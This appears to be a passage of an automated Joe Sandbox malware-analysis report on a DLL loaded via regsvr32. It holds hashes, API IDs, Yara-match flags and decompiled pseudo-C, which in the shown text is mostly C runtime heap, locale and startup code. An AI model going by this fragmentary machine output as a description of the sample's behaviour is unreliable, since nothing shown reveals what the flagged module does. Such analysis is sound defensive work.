                                                                                • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                • Instruction Fuzzy Hash: 4F911E36618B8596E7608F15E88036E77F0FB89794F488135EA9D477A8DFBCE541CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E00007FFA7FFA5246461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                                                                				signed int _t64;
                                                                                				intOrPtr _t66;
                                                                                				void* _t73;
                                                                                				void* _t92;
                                                                                				long long _t98;
                                                                                				long long _t113;
                                                                                				long long _t114;
                                                                                				long long _t115;
                                                                                				long long _t130;
                                                                                				intOrPtr _t132;
                                                                                				long long _t135;
                                                                                
                                                                                				if (_a136 == 1) goto 0x52464672;
                                                                                				_t64 = _a136 & 0x0000ffff;
                                                                                				if (_t64 == 2) goto 0x52464672;
                                                                                				if (_a136 == 3) goto 0x52464672;
                                                                                				_a40 = "Error: memory allocation: bad memory block type.\n";
                                                                                				_a32 = "%s";
                                                                                				r9d = 0;
                                                                                				r8d = 0;
                                                                                				0x5246ad00();
                                                                                				if (_t64 != 1) goto 0x52464672;
                                                                                				asm("int3");
                                                                                				_t98 = _a128 + 0x34;
                                                                                				_a96 = _t98;
                                                                                				0x5246ac90(); // executed
                                                                                				_a80 = _t98;
                                                                                				if (_a80 != 0) goto 0x524646b8;
                                                                                				if (_a160 == 0) goto 0x524646b3;
                                                                                				 *_a160 = 0xc;
                                                                                				goto 0x524648b4;
                                                                                				_t66 =  *0x5248b03c; // 0x38
                                                                                				 *0x5248b03c = _t66 + 1;
                                                                                				if (_a64 == 0) goto 0x5246472d;
                                                                                				 *_a80 = 0;
                                                                                				 *((long long*)(_a80 + 8)) = 0;
                                                                                				 *((long long*)(_a80 + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                                                                				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                				 *(_a80 + 0x1c) = 3;
                                                                                				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                                                                				goto 0x52464844;
                                                                                				if (0xffffffff -  *0x5248c960 - _a128 <= 0) goto 0x52464763;
                                                                                				_t130 =  *0x5248c960; // 0x4509
                                                                                				 *0x5248c960 = _t130 + _a128;
                                                                                				goto 0x5246476e;
                                                                                				 *0x5248c960 = 0xffffffff;
                                                                                				_t132 =  *0x5248c990; // 0xb3d
                                                                                				 *0x5248c990 = _t132 + _a128;
                                                                                				_t113 =  *0x5248c978; // 0x3425
                                                                                				_t92 =  *0x5248c990 - _t113; // 0xb3d
                                                                                				if (_t92 <= 0) goto 0x524647a8;
                                                                                				_t114 =  *0x5248c990; // 0xb3d
                                                                                				 *0x5248c978 = _t114;
                                                                                				if ( *0x5248c980 == 0) goto 0x524647c4;
                                                                                				_t115 =  *0x5248c980; // 0x2510b50
                                                                                				 *((long long*)(_t115 + 8)) = _a80;
                                                                                				goto 0x524647d0;
                                                                                				 *0x5248c968 = _a80;
                                                                                				_t135 =  *0x5248c980; // 0x2510b50
                                                                                				 *_a80 = _t135;
                                                                                				 *((long long*)(_a80 + 8)) = 0;
                                                                                				 *((long long*)(_a80 + 0x10)) = _a144;
                                                                                				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                                                                				 *((long long*)(_a80 + 0x20)) = _a128;
                                                                                				 *(_a80 + 0x1c) = _a136;
                                                                                				_t78 = _a88;
                                                                                				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                                                                				 *0x5248c980 = _a80;
                                                                                				r8d = 4;
                                                                                				E00007FFA7FFA524632B0( *0x5248b04c & 0x000000ff, _a88,  *0x5248b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                                                                				_t145 = _a128;
                                                                                				r8d = 4;
                                                                                				E00007FFA7FFA524632B0( *0x5248b04c & 0x000000ff, _a88,  *0x5248b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                                                                				_t73 = E00007FFA7FFA524632B0( *0x5248b04f & 0x000000ff, _t78,  *0x5248b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                                                                				_a72 = _a80 + 0x30;
                                                                                				return E00007FFA7FFA52469360(_t73, 4);
                                                                                			}















                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: _unlock
                                                                                • String ID: Error: memory allocation: bad memory block type.
                                                                                • API String ID: 2480363372-1537269110
                                                                                • Opcode ID: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                • Instruction ID: 0668d104d0b53f96e2a9f97f40a07c2dac6463ed54f7c3ea43b86d9ce6363393
                                                                                • Opcode Fuzzy Hash: 0e27953d906dd6213389af50a7459ab3260dce137a7056963e47b3559a26f049
                                                                                • Instruction Fuzzy Hash: 47710036A19B8586DB64CB55F89032AB7F0F78AB54F048575DA9D437A8CFBCD044CB00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: z
                                                                                • API String ID: 963392458-1375040831
                                                                                • Opcode ID: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                • Instruction ID: 5490f85ef4092ec497088e60b932e525f0ce693db587fe3a551d92928695aba5
                                                                                • Opcode Fuzzy Hash: 044b6e1ce48cfd18270e48a4d1ffa5fa37b68dcc1aa27e33fe08f1a26b59e50a
                                                                                • Instruction Fuzzy Hash: 5141C27191C7848FD7A5DF18D08A7DAB7E0FB98318F01495DE88CC7292DB749885CB46
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476229971.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: z
                                                                                • API String ID: 963392458-1375040831
                                                                                • Opcode ID: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                • Instruction ID: 90d0215384d3738c1bd812602d16852eefab8a4974bd8bae5625081230a7a3ff
                                                                                • Opcode Fuzzy Hash: 274a6825be770f02a4f82c9f6cbe831b28a77f7637ef6bb2e3a1323e28db6850
                                                                                • Instruction Fuzzy Hash: 4741377091CB848BD7B4DF18D08A7AAB7E0FB98315F10495EE88CC3252DB7498848B86
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer_initterm_e
                                                                                • String ID: Y
                                                                                • API String ID: 1618838664-1754117475
                                                                                • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                • Instruction ID: 714057d16cc1c7af4527cd2a5c9e9bd6aadedecc2b5737a765fec0c4cca89430
                                                                                • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                                                                • Instruction Fuzzy Hash: 79E0C921A2C482A7E620EB20EC441BA33F0FF92348F488131E24E464ADDFACF945CB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 47%
                                                                                			E00007FFA7FFA5246A000(signed short __ecx, void* __rcx, long long __rdx, signed int _a8, void* _a16) {
                                                                                				signed int _v24;
                                                                                				signed char* _v32;
                                                                                				char _v50;
                                                                                				char _v56;
                                                                                				signed int _v72;
                                                                                				signed char* _v80;
                                                                                				signed int _v84;
                                                                                				signed int _v88;
                                                                                				signed long long _t204;
                                                                                				signed long long _t205;
                                                                                				signed long long _t206;
                                                                                				signed char* _t215;
                                                                                				signed long long _t218;
                                                                                				signed long long _t233;
                                                                                				signed long long _t234;
                                                                                
                                                                                				_a16 = __rdx;
                                                                                				_a8 = __ecx;
                                                                                				_t204 =  *0x5248b018; // 0x6ebca90f5d98
                                                                                				_t205 = _t204 ^ _t234;
                                                                                				_v24 = _t205;
                                                                                				_a8 = E00007FFA7FFA52469F20(_a8, _t205);
                                                                                				if (_a8 != 0) goto 0x5246a04d;
                                                                                				E00007FFA7FFA5246A4E0(_a16);
                                                                                				goto 0x5246a463;
                                                                                				_v84 = 0;
                                                                                				_v84 = _v84 + 1;
                                                                                				if (_t205 - 5 >= 0) goto 0x5246a239;
                                                                                				_t206 = _t205 * 0x30;
                                                                                				if ( *((intOrPtr*)(0x5248bb70 + _t206)) != _a8) goto 0x5246a234;
                                                                                				_v72 = 0;
                                                                                				goto 0x5246a0a2;
                                                                                				_v72 = _v72 + 1;
                                                                                				if (_v72 - 0x101 >= 0) goto 0x5246a0bf;
                                                                                				 *((char*)(_a16 + _t206 + 0x1c)) = 0;
                                                                                				goto 0x5246a098;
                                                                                				_v88 = 0;
                                                                                				goto 0x5246a0d3;
                                                                                				_v88 = _v88 + 1;
                                                                                				if (_v88 - 4 >= 0) goto 0x5246a197;
                                                                                				_v80 = 0x47fcce48e9700;
                                                                                				goto 0x5246a111;
                                                                                				_v80 =  &(_v80[2]);
                                                                                				if (( *_v80 & 0x000000ff) == 0) goto 0x5246a192;
                                                                                				if ((_v80[1] & 0x000000ff) == 0) goto 0x5246a192;
                                                                                				_v72 =  *_v80 & 0x000000ff;
                                                                                				goto 0x5246a142;
                                                                                				_v72 = _v72 + 1;
                                                                                				_t215 = _v80;
                                                                                				if (_v72 - ( *(_t215 + 1) & 0x000000ff) > 0) goto 0x5246a18d;
                                                                                				_t233 = _a16;
                                                                                				 *((char*)(_t233 + 0x5248bb70 + _t206 * 0x30 + 0x1c)) =  *(_a16 + _t215 + 0x1c) & 0x000000ff |  *0xFFF4A49176D8;
                                                                                				goto 0x5246a138;
                                                                                				goto 0x5246a103;
                                                                                				goto 0x5246a0c9;
                                                                                				 *(_a16 + 4) = _a8;
                                                                                				 *((intOrPtr*)(_a16 + 8)) = 1;
                                                                                				_t218 = _a16;
                                                                                				 *(_a16 + 0xc) = E00007FFA7FFA5246A480( *((intOrPtr*)(_t218 + 4)));
                                                                                				_v88 = 0;
                                                                                				goto 0x5246a1e7;
                                                                                				_v88 = _v88 + 1;
                                                                                				if (_v88 - 6 >= 0) goto 0x5246a220;
                                                                                				_t205 = 0x5248bb70;
                                                                                				 *((short*)(_a16 + 0x10 + _t233 * 2)) =  *(0x5248bb70 + 4 + (0x5248bb70 + _t218 * 0x30) * 2) & 0x0000ffff;
                                                                                				goto 0x5246a1dd;
                                                                                				E00007FFA7FFA5246A5E0(_a16);
                                                                                				goto 0x5246a463;
                                                                                				goto L1;
                                                                                				if (_a8 == 0) goto 0x5246a271;
                                                                                				if (_a8 == 0xfde8) goto 0x5246a271;
                                                                                				if (_a8 == 0xfde9) goto 0x5246a271;
                                                                                				__eax = _a8 & 0x0000ffff;
                                                                                				__ecx = _a8 & 0x0000ffff;
                                                                                				if (IsValidCodePage(??) != 0) goto 0x5246a27b;
                                                                                				__eax = 0xffffffff;
                                                                                				goto 0x5246a463;
                                                                                				__rdx =  &_v56;
                                                                                				__ecx = _a8;
                                                                                				if (GetCPInfo(??, ??) == 0) goto 0x5246a444;
                                                                                				_v72 = 0;
                                                                                				goto 0x5246a2a9;
                                                                                				_v72 = _v72 + 1;
                                                                                				_v72 = _v72 + 1;
                                                                                				if (_v72 - 0x101 >= 0) goto 0x5246a2c6;
                                                                                				__eax = _v72;
                                                                                				__rcx = _a16;
                                                                                				 *((char*)(_a16 + __rax + 0x1c)) = 0;
                                                                                				goto 0x5246a29f;
                                                                                				__rax = _a16;
                                                                                				__ecx = _a8;
                                                                                				 *(_a16 + 4) = _a8;
                                                                                				__rax = _a16;
                                                                                				 *(_a16 + 0xc) = 0;
                                                                                				if (_v56 - 1 <= 0) goto 0x5246a3f4;
                                                                                				__rax =  &_v50;
                                                                                				_v32 =  &_v50;
                                                                                				goto 0x5246a30c;
                                                                                				_v32 =  &(_v32[2]);
                                                                                				_v32 =  &(_v32[2]);
                                                                                				__rax = _v32;
                                                                                				__eax =  *_v32 & 0x000000ff;
                                                                                				if (( *_v32 & 0x000000ff) == 0) goto 0x5246a37c;
                                                                                				__rax = _v32;
                                                                                				__eax =  *(__rax + 1) & 0x000000ff;
                                                                                				if (( *(__rax + 1) & 0x000000ff) == 0) goto 0x5246a37c;
                                                                                				__rax = _v32;
                                                                                				__eax =  *_v32 & 0x000000ff;
                                                                                				_v72 =  *_v32 & 0x000000ff;
                                                                                				goto 0x5246a33d;
                                                                                				_v72 = _v72 + 1;
                                                                                				_v72 = _v72 + 1;
                                                                                				__rax = _v32;
                                                                                				__eax =  *(__rax + 1) & 0x000000ff;
                                                                                				if (_v72 - ( *(__rax + 1) & 0x000000ff) > 0) goto 0x5246a37a;
                                                                                				_v72 = _v72 + 1;
                                                                                				__rcx = _a16;
                                                                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000004;
                                                                                				_v72 = _v72 + 1;
                                                                                				__rdx = _a16;
                                                                                				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
                                                                                				goto 0x5246a333;
                                                                                				goto 0x5246a2fe;
                                                                                				_v72 = 1;
                                                                                				goto 0x5246a390;
                                                                                				_v72 = _v72 + 1;
                                                                                				_v72 = _v72 + 1;
                                                                                				if (_v72 - 0xff >= 0) goto 0x5246a3c8;
                                                                                				_v72 = _v72 + 1;
                                                                                				__rcx = _a16;
                                                                                				 *(__rcx + __rax + 0x1c) & 0x000000ff =  *(__rcx + __rax + 0x1c) & 0x000000ff | 0x00000008;
                                                                                				_v72 = _v72 + 1;
                                                                                				__rdx = _a16;
                                                                                				 *((char*)(_a16 + __rcx + 0x1c)) = __al;
                                                                                				goto 0x5246a386;
                                                                                				__rax = _a16;
                                                                                				__ecx =  *(_a16 + 4);
                                                                                				__eax = E00007FFA7FFA5246A480( *(_a16 + 4));
                                                                                				__rcx = _a16;
                                                                                				 *(_a16 + 0xc) = __eax;
                                                                                				__rax = _a16;
                                                                                				 *((intOrPtr*)(_a16 + 8)) = 1;
                                                                                				goto 0x5246a403;
                                                                                				__rax = _a16;
                                                                                				 *(__rax + 8) = 0;
                                                                                				_v88 = 0;
                                                                                				goto 0x5246a417;
                                                                                				_v88 = _v88 + 1;
                                                                                				_v88 = _v88 + 1;
                                                                                				if (_v88 - 6 >= 0) goto 0x5246a433;
                                                                                				__eax = _v88;
                                                                                				__ecx = 0;
                                                                                				__rdx = _a16;
                                                                                				 *((short*)(_a16 + 0x10 + __rax * 2)) = __cx;
                                                                                				goto 0x5246a40d;
                                                                                				__rcx = _a16;
                                                                                				__eax = E00007FFA7FFA5246A5E0(_a16); // executed
                                                                                				__eax = 0;
                                                                                				goto 0x5246a463;
                                                                                				if ( *0x5248cd68 == 0) goto 0x5246a45e;
                                                                                				__rcx = _a16;
                                                                                				E00007FFA7FFA5246A4E0(_a16) = 0;
                                                                                				goto 0x5246a463;
                                                                                				__eax = 0xffffffff;
                                                                                				__rcx = _v24;
                                                                                				__rcx = _v24 ^ __rsp;
                                                                                				return E00007FFA7FFA52463280(0xffffffff, __ecx, __edx, _v24 ^ __rsp, __rdx, __r8);
                                                                                			}



















                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Locale$UpdateUpdate::~_
                                                                                • String ID:
                                                                                • API String ID: 1901436342-0
                                                                                • Opcode ID: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                • Instruction ID: e663cfca82f58cefa88257072fbb953d0bdc0f3644d3996fa13f2cc0e14c2a4f
                                                                                • Opcode Fuzzy Hash: bd1aa9bb27f65b33b611181b282d42369fc0b805d559ad423015dd3100174c74
                                                                                • Instruction Fuzzy Hash: 62D11E3261CA918AD7A4CB15E88476AB7F0F789744F188135EACE87B98DF7CE4458F00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 62%
                                                                                			E00007FFA7FFA52467540(long long __rax) {
                                                                                				long long _v24;
                                                                                				void* _t8;
                                                                                				void* _t9;
                                                                                
                                                                                				_t16 = __rax;
                                                                                				_t9 = E00007FFA7FFA52463D00(_t8); // executed
                                                                                				_v24 = __rax;
                                                                                				return E00007FFA7FFA5246CF20(E00007FFA7FFA5246CFB0(E00007FFA7FFA5246D450(E00007FFA7FFA5246D470(E00007FFA7FFA5246BD50(E00007FFA7FFA5246AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                                                                			}







                                                                                APIs
                                                                                  • Part of subcall function 00007FFA52463D00: RtlEncodePointer.NTDLL ref: 00007FFA52463D06
                                                                                • _initp_misc_winsig.LIBCMTD ref: 00007FFA5246757B
                                                                                • _initp_eh_hooks.LIBCMTD ref: 00007FFA52467585
                                                                                  • Part of subcall function 00007FFA5246CF20: EncodePointer.KERNEL32(?,?,?,?,00007FFA5246758A,?,?,?,?,?,?,00007FFA52463D39), ref: 00007FFA5246CF30
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                                                                • String ID:
                                                                                • API String ID: 2678799220-0
                                                                                • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                • Instruction ID: e3a178054c10b367b528a24c8050abe3cbe8c90c3b0a34854669cd3b203055d7
                                                                                • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                                                                • Instruction Fuzzy Hash: 97E0E96791889185D524BB11EC5206A57B0BBC5B88F444131F6CD46ABFCE9CF9108A40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess$AllocateHeap__crt
                                                                                • String ID:
                                                                                • API String ID: 4215626177-0
                                                                                • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                • Instruction ID: b1b13305f9e9e23a3f7190889e0675ce18bbc082a12c7696b1e08f915e011e97
                                                                                • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                                                                • Instruction Fuzzy Hash: EDE04F2190898683E624A715E81437A62F1FF86748F588036D64E02AA9CFADE440E600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00007FFA7FFA52464399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                                                                
                                                                                				_a48 = __rax;
                                                                                				if (_a48 == 0) goto 0x524643ad;
                                                                                				goto 0x524643f5;
                                                                                				if (_a88 != 0) goto 0x524643ce;
                                                                                				if (_a120 == 0) goto 0x524643c7;
                                                                                				 *_a120 = 0xc;
                                                                                				goto 0x524643f5;
                                                                                				if (E00007FFA7FFA5246ABB0(_a48, _a80) != 0) goto 0x524643f3;
                                                                                				if (_a120 == 0) goto 0x524643ef;
                                                                                				 *_a120 = 0xc;
                                                                                				goto 0x524643f5;
                                                                                				goto 0x52464377;
                                                                                				return 0;
                                                                                			}




                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.476304193.00007FFA52461000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFA52460000, based on PE: true
                                                                                • Associated: 00000003.00000002.476299554.00007FFA52460000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476325783.00007FFA52482000.00000002.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476342331.00007FFA5248B000.00000004.00000001.01000000.00000007.sdmp
                                                                                • Associated: 00000003.00000002.476361342.00007FFA5248F000.00000002.00000001.01000000.00000007.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ffa52460000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                • Instruction ID: 0b05c921b644befdeb06e54c72c2c50201c10d975699b6b5fa9e1834da094ebe
                                                                                • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                                                                • Instruction Fuzzy Hash: 8001A82261C741C6EA609B15F84472AA7F0F785794F188131EA8E42AA8CFFCE4808B00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Locale$ByteCharMultiUpdateUpdate::~_Wide
                                                                                • String ID:
                                                                                • API String ID: 2569699860-0
                                                                                • Opcode ID: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                • Instruction ID: 98a37ed1223786f4b3595c37c66c6b708ad877743ae5b6dfda59a929dc97dd28
                                                                                • Opcode Fuzzy Hash: 0c57b3b436687e78039d68963cfd06a068c3edb785e51800680b91c9a9ce0a07
                                                                                • Instruction Fuzzy Hash: D801B072A187C08AC760DF10F48069AB7A1F7D9384F50812AEACD43B59CB3CE514CF40
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _ioterm
                                                                                • String ID:
                                                                                • API String ID: 4163092671-0
                                                                                • Opcode ID: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                • Instruction ID: 34c0add8fd5378dbf56ee51c8c349fc5bd57afd514425de6b60a4f94f64b118f
                                                                                • Opcode Fuzzy Hash: c4661e6c861f00f368b387c53bfc5a2878f93a0c021545087ea26df979c33d88
                                                                                • Instruction Fuzzy Hash: 89F08C21C2C28399F369AB64EC0533969F0AF03B50F0CC274E02D818DECFECB8458A21
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _ioterm.LIBCMTD ref: 00007FFA52463437
                                                                                  • Part of subcall function 00007FFA52467D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFA5246343C), ref: 00007FFA52467D93
                                                                                  • Part of subcall function 00007FFA52463E00: FlsFree.KERNEL32 ref: 00007FFA52463E13
                                                                                  • Part of subcall function 00007FFA52463E00: _mtdeletelocks.LIBCMTD ref: 00007FFA52463E23
                                                                                  • Part of subcall function 00007FFA524688D0: HeapDestroy.KERNELBASE ref: 00007FFA524688DB
                                                                                Similarity
                                                                                • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                                                                • String ID:
                                                                                • API String ID: 1508997487-0
                                                                                • Opcode ID: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                • Instruction ID: 9f91e5cdff78de30267389c37e49c5ef5df9c8a38c5821d9c9768daed50533ff
                                                                                • Opcode Fuzzy Hash: 8c7cd16c52d3f74447f8a2e4d1e0973512220e22c4a7d0e47614c04d6d0045ae
                                                                                • Instruction Fuzzy Hash: 3DE01760E1C1439AF3096B60AC022B919F19F03B81F4CC430E10EC22DFEECCB8010265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: DestroyHeap
                                                                                • String ID:
                                                                                • API String ID: 2435110975-0
                                                                                • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                • Instruction ID: fcc5632f4c7c486cd64691234b421b0e32b55f99f7c51edf4a5e50edbc84cf03
                                                                                • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                                                • Instruction Fuzzy Hash: CEC04C65D25E41D1E608E711FC8532422F06B96705F948030C51D016288FAD95968700
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID:
                                                                                • API String ID: 2118026453-0
                                                                                • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                • Instruction ID: 146f7b81c00d896ce878741c0aad51f0c433fd68848a25f2d0d30132a6cbe3ea
                                                                                • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                                                • Instruction Fuzzy Hash: B9A01120E22080A2CA0C33222C8202800A02B0A208EE00828C30F002088C2C82EA8A00
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
